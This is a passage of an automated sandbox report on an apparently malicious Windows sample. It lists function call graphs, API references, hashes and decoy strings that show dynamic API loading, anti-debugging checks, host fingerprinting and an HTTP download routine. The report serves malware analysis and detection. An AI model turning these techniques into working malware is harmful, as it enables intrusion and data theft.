                                      • LoadLibraryA.KERNEL32(01D825A8,?,00F26CA0), ref: 00F29E0D
                                      • LoadLibraryA.KERNEL32(01D82560,?,00F26CA0), ref: 00F29E1F
                                      • LoadLibraryA.KERNEL32(01D82548,?,00F26CA0), ref: 00F29E30
                                      • GetProcAddress.KERNEL32(75A70000,01D825C0), ref: 00F29E52
                                      • GetProcAddress.KERNEL32(75290000,01D82578), ref: 00F29E73
                                      • GetProcAddress.KERNEL32(75290000,01D825D8), ref: 00F29E8B
                                      • GetProcAddress.KERNEL32(75BD0000,01D82518), ref: 00F29EAD
                                      • GetProcAddress.KERNEL32(75450000,01D75750), ref: 00F29ECE
                                      • GetProcAddress.KERNEL32(76E90000,01D89128), ref: 00F29EEF
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00F29F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00F29EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: bff94f381aa73012fc89ebc0e17ffffc0b27b16c9247254cc236366fb2ef096d
                                      • Instruction ID: 61cd237d840f9cf558760a5a01e23251003face52db0c6505ed317ff74f6711e
                                      • Opcode Fuzzy Hash: bff94f381aa73012fc89ebc0e17ffffc0b27b16c9247254cc236366fb2ef096d
                                      • Instruction Fuzzy Hash: 1FA121B55002019FE36CDFE8F88896677EAE759701750893AF52A8B298D734A5C1CFA0
                                      Function 00F14610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 764 f14610-f146e5 RtlAllocateHeap 781 f146f0-f146f6 764->781 782 f146fc-f1479a 781->782 783 f1479f-f147f9 VirtualProtect 781->783 782->781
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F1465F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F147EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146FC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14672
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14784
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F147CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146B2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F1479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F146D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F14712
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 5cf6c26ab2a3692b0bf29a0ef67820f9b1d2e53a05ec48b19749afe9cc17433c
                                      • Instruction ID: d14bf470930b4d811f4aab2822e73724bb0c6ac7c34e8a81ea31106601fce6fe
                                      • Opcode Fuzzy Hash: 5cf6c26ab2a3692b0bf29a0ef67820f9b1d2e53a05ec48b19749afe9cc17433c
                                      • Instruction Fuzzy Hash: 4B4123607C2615FFC628F7E4894EE9D76637F82B94F609040BA02562C2CBF0D5886723
                                      Function 00F162D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1033 f162d0-f1635b call f2aab0 call f14800 call f2aa50 InternetOpenA StrCmpCA 1040 f16364-f16368 1033->1040 1041 f1635d 1033->1041 1042 f16559-f16575 call f2aab0 call f2ab10 * 2 1040->1042 1043 f1636e-f16392 InternetConnectA 1040->1043 1041->1040 1061 f16578-f1657d 1042->1061 1044 f16398-f1639c 1043->1044 1045 f1654f-f16553 InternetCloseHandle 1043->1045 1047 f163aa 1044->1047 1048 f1639e-f163a8 1044->1048 1045->1042 1051 f163b4-f163e2 HttpOpenRequestA 1047->1051 1048->1051 1053 f16545-f16549 InternetCloseHandle 1051->1053 1054 f163e8-f163ec 1051->1054 1053->1045 1056 f16415-f16455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 f163ee-f1640f InternetSetOptionA 1054->1057 1059 f16457-f16477 call f2aa50 call f2ab10 * 2 1056->1059 1060 f1647c-f1649b call f28ad0 1056->1060 1057->1056 1059->1061 1067 f16519-f16539 call f2aa50 call f2ab10 * 2 1060->1067 1068 f1649d-f164a4 1060->1068 1067->1061 1071 f16517-f1653f InternetCloseHandle 1068->1071 1072 f164a6-f164d0 InternetReadFile 1068->1072 1071->1053 1076 f164d2-f164d9 1072->1076 1077 f164db 1072->1077 1076->1077 1080 f164dd-f16515 call f2acc0 call f2abb0 call f2ab10 1076->1080 1077->1071 1080->1072
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • InternetOpenA.WININET(00F30DFF,00000001,00000000,00000000,00000000), ref: 00F16331
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F163D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F1640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F16421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F1644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F164BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00F1653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16549
                                      • InternetCloseHandle.WININET(00000000), ref: 00F16553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: ec5c4a983faf953bc10160b3211377c42c80ff0147678b1ef41d3f8a23ec1047
                                      • Instruction ID: 5fd259f89465bc0e733f7efcbc3842f7c9232d0c7571469902b1a760ae8fd493
                                      • Opcode Fuzzy Hash: ec5c4a983faf953bc10160b3211377c42c80ff0147678b1ef41d3f8a23ec1047
                                      • Instruction Fuzzy Hash: 7C713D71A00218EBDB24DFD0DC55BEEB7B5BB44710F108198F50AAB1C4DBB46A84DF51
                                      Function 00F27690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1356 f27690-f276da GetWindowsDirectoryA 1357 f276e3-f27757 GetVolumeInformationA call f28e90 * 3 1356->1357 1358 f276dc 1356->1358 1365 f27768-f2776f 1357->1365 1358->1357 1366 f27771-f2778a call f28e90 1365->1366 1367 f2778c-f277a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 f277b8-f277e8 wsprintfA call f2aa50 1367->1369 1370 f277a9-f277b6 call f2aa50 1367->1370 1377 f2780e-f2781e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F276D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F2779A
                                      • wsprintfA.USER32 ref: 00F277D0
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 175f8c3c911f15305b94b60859e0b1e9f74dbe1f3eda606ea9438c7bb42efba5
                                      • Instruction ID: 94f2a8b372a5d89341f86b28a2191c307068dba8b85c4499a0cd871dc7bace39
                                      • Opcode Fuzzy Hash: 175f8c3c911f15305b94b60859e0b1e9f74dbe1f3eda606ea9438c7bb42efba5
                                      • Instruction Fuzzy Hash: F44194B1D04358DBDB14DFD4DC45BDEBBB8AF48704F104099F609AB280D778AA84DBA5
                                      Function 00F279E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F27A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 79aba22e8a9cd62bd388bbb8a3d2f16d7e9d26c20289d5d8ee22fcfb70dc8138
                                      • Instruction ID: 4964c5d4f762121124ea51298a60cd011d4138ee4fd0478146f3b01d7021f65c
                                      • Opcode Fuzzy Hash: 79aba22e8a9cd62bd388bbb8a3d2f16d7e9d26c20289d5d8ee22fcfb70dc8138
                                      • Instruction Fuzzy Hash: 5FF04FB1D44209EBD714DFD8DD45BAEBBB8EB05721F10022AFA15A6680C7B555408BE1
                                      Function 00F11160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 24cc833ec2507d310fce2aaf5ef79b01465bedd8b4a9e1e40750f4cf0e73739c
                                      • Instruction ID: cffe8944923e8652ba091b1fdfdddb634c49e6d1cbb0a559c2e4e6677bf4b0cb
                                      • Opcode Fuzzy Hash: 24cc833ec2507d310fce2aaf5ef79b01465bedd8b4a9e1e40750f4cf0e73739c
                                      • Instruction Fuzzy Hash: A6D05E7490030CABDB18DFE098496DDBBB9BB08215F000568D91572280EA3094C1CBA5
                                      Function 00F29F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
